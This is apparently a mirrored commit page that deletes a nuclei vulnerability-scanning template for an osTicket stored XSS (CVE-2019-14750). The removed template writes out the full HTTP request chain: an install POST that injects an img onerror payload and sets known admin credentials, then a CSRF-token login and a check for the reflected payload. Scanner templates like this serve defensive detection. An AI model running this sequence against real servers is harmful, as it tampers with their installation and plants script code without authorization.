daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete CVE-2019-14750.yaml

patch-1
TenBird-1 2022-09-01 00:38:28 +09:00 committed by GitHub
parent 833f05f9df
commit d2398e5769
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
cves/2019/CVE-2019-14750.yaml
View File

@ -1,61 +0,0 @@
id: CVE-2019-14750
info:
name: osTicket Stored XSS before 1.10.7 and 1.12.x before 1.12.1
author: TenBird
severity: Medium
description: An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-14750
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-14750
cwe-id: CWE-79
tags: cve,cve2019,Stored XSS,Cross-Site-Script
requests:
- raw:
- |
POST /upload/setup/install.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
s=install&name=test&email=test%40test.com&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email=test222%40test.com&username=test&passwd=asdf1234&passwd2=asdf1234&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo
- |
GET /upload/scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /upload/scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid=test&passwd=asdf1234&ajax=1
- |
GET /upload/scp/settings.php HTTP/1.1
Host: {{Hostname}}
redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '<img src=x onerror=alert(1);>'
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true